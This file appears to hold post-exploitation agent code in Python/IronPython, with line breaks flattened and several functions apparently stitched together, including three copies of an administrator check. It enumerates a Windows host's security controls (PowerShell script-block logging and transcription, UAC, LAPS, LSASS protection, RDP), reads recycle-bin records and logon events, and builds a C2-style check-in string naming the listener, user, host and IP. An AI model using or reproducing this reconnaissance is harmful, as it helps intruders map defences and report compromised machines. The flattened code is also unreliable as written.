def systemInfo(): verInfo = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" psKey = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine" sysPolKey = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" sysSummary = printHeader("SYSTEM INFORMATION") sysSummary += "{0:<10}: {1}\n".format("Host", Env.MachineName) sysSummary += "{0:<10}: {1} {2}\n".format("OS", Registry.GetValue(verInfo, "ProductName", "Windows"), Diagnostics.FileVersionInfo.GetVersionInfo(Env.SystemDirectory + "\\kernel32.dll").ProductVersion) sysSummary += "{0:<10}: {1}\n".format("64-Bit", Env.Is64BitOperatingSystem) sysSummary += "{0:<10}: {1}\n".format("Date", DateTime.Now.ToString()) sysSummary += "{0:<10}: {1}\n\n".format("Uptime", DateTimeOffset(DateTime.Now).AddMilliseconds(-Env.TickCount).LocalDateTime) sysSummary += "{0:<14}: {1}\{2}\n".format("Username", Env.UserDomainName, Env.UserName) sysSummary += "{0:<14}: {1}\n\n".format("Logon Server", Env.GetEnvironmentVariable("LOGONSERVER")) sysSummary += "{0:<22}: {1}\n".format("PowerShell Version", Registry.GetValue(psKey, "PowerShellVersion", "N/A - Likely 2.0")) sysSummary += "{0:<22}: {1}\n".format("PowerShell Compat", Registry.GetValue(psKey, "PSCompatibleVersion", "N/A - Likely 1.0, 2.0")) sysSummary += "{0:<22}: {1}\n".format("PS Script Block Log", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging", "EnableScriptBlockLogging", "N/A")) sysSummary += "{0:<22}: {1}\n".format("PS Transcription", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription", "EnableTranscripting", "N/A")) sysSummary += "{0:<22}: {1}\n".format("PS Transcription Dir", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription", "OutputDirectory", "N/A")) sysSummary += "{0:<22}: {1}\n\n".format("PS Module Logging", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging", "EnableModuleLogging", "N/A")) sysSummary += "{0:<27}: {1}\n".format("UAC Enabled", Convert.ToBoolean(Registry.GetValue(sysPolKey, "EnableLUA", "N/A"))) sysSummary += "{0:<27}: {1}\n".format("High Integrity", WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) sysSummary += "{0:<27}: {1}\n".format("UAC Token Filter Disabled", Registry.GetValue(sysPolKey, "LocalAccount", False)) sysSummary += "{0:<27}: {1}\n".format("UAC Admin Filter Enabled", Registry.GetValue(sysPolKey, "FilterAdministratorToken", False)) sysSummary += "{0:<27}: {1}\n".format("Local Admin Pass Solution", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft Services\AdmPwd", "AdmPwdEnabled", "N/A")) sysSummary += "{0:<27}: {1}\n".format("LSASS Protection", Registry.GetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", "RunAsPPL", "N/A")) sysSummary += "{0:<27}: {1}\n".format("Deny RDP Connections", Convert.ToBoolean(Registry.GetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server", "FDenyTSConnections", "N/A"))) return sysSummary
def recycleBin(): summary = printHeader("RECYCLE BIN") if WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator): for drive in DriveInfo.GetDrives(): try: recycleDir = DirectoryInfo(drive.Name + "$Recycle.Bin\\") for dir in DirectoryInfo.EnumerateDirectories(recycleDir): fileList = DirectoryInfo.GetFiles(dir) summary += printSubheader("Directory: {0}".format(dir.FullName)) for file in fileList: name = file.FullName.split("\\")[-1] if name.startswith("$I"): info = open(file.FullName, "r").read() summary += "{0}\t{1}\n".format(name.replace("$I", "$R"), info[26::2]) except IOError: pass else: for drive in DriveInfo.GetDrives(): try: recycleDir = drive.Name + "$Recycle.Bin\\" user = WindowsIdentity.GetCurrent() fileList = Directory.GetFiles(recycleDir + user.Owner.ToString()) summary += printSubheader("Directory: {0}".format(recycleDir + user.Owner.ToString())) for file in fileList: name = file.split("\\")[-1] if name.startswith("$I"): info = open(file, "r").read() summary += "{0}\t{1}\n".format(name.replace("$I", "$R"), info[26::2]) except IOError: pass return summary
def logonEvents(): summary = printHeader("LOGON EVENTS") if WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator): sec = EventLog("Security") logons = [event for event in sec.Entries if event.InstanceId == 4624] for logon in logons[:10]: idx = logon.Message.IndexOf("This event is generated") message = logon.Message.Remove(idx) summary += printSubheader("Time Created: {0}".format(logon.TimeGenerated.ToString())) summary += message return summary else: return summary + "\nNot administrator!\n"
def is_high_integrity(self): identity = WindowsIdentity.GetCurrent() principal = WindowsPrincipal(identity) return principal.IsInRole(WindowsBuiltInRole.Administrator)
def get_sysinfo(nonce='00000000'): # NOTE: requires global variable "server" to be set # nonce | listener | domainname | username | hostname | internal_ip | os_details | os_details | high_integrity | process_name | process_id | language | language_version | architecture __FAILED_FUNCTION = '[FAILED QUERY]' try: if platform.python_implementation() == 'IronPython': username = Environment.UserName else: username = pwd.getpwuid(os.getuid())[0].strip("\\") except Exception as e: username = __FAILED_FUNCTION try: if platform.python_implementation() == 'IronPython': uid = WindowsIdentity.GetCurrent().User.ToByteArray() else: uid = os.popen('id -u').read().strip() except Exception as e: uid = __FAILED_FUNCTION try: if platform.python_implementation() == 'IronPython': highIntegrity = WindowsPrincipal( WindowsIdentity.GetCurrent()).IsInRole( WindowsBuiltInRole.Administrator) else: highIntegrity = "True" if (uid == "0") else False except Exception as e: highIntegrity = __FAILED_FUNCTION try: if platform.python_implementation() != 'IronPython': osDetails = os.uname() except Exception as e: osDetails = __FAILED_FUNCTION try: if platform.python_implementation() == 'IronPython': hostname = Environment.MachineName else: hostname = osDetails[1] except Exception as e: hostname = __FAILED_FUNCTION try: internalIP = socket.gethostbyname(socket.gethostname()) except Exception as e: try: internalIP = os.popen( "ifconfig|grep inet|grep inet6 -v|grep -v 127.0.0.1|cut -d' ' -f2" ).read() except Exception as e1: internalIP = __FAILED_FUNCTION try: if platform.python_implementation() == 'IronPython': osDetails = Environment.OSVersion.ToByteArray() else: osDetails = ",".join(osDetails) except Exception as e: osDetails = __FAILED_FUNCTION try: if platform.python_implementation() == 'IronPython': processID = Process.GetCurrentProcess().Id else: processID = os.getpid() except Exception as e: processID = __FAILED_FUNCTION try: temp = sys.version_info pyVersion = "%s.%s" % (temp[0], temp[1]) except Exception as e: pyVersion = __FAILED_FUNCTION try: architecture = platform.machine() except Exception as e: architecture = __FAILED_FUNCTION if platform.python_implementation() == 'IronPython': language = 'ironpython' processName = Process.GetCurrentProcess() else: language = 'python' cmd = 'ps %s' % (os.getpid()) ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = ps.communicate() parts = out.split(b"\n") if len(parts) > 2: processName = b" ".join(parts[1].split()[4:]).decode('UTF-8') else: processName = 'python' return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % ( nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion, architecture)
def IsHighIntegrity(): identity = WindowsIdentity.GetCurrent() principal = WindowsPrincipal(identity) return principal.IsInRole(WindowsBuiltInRole.Administrator)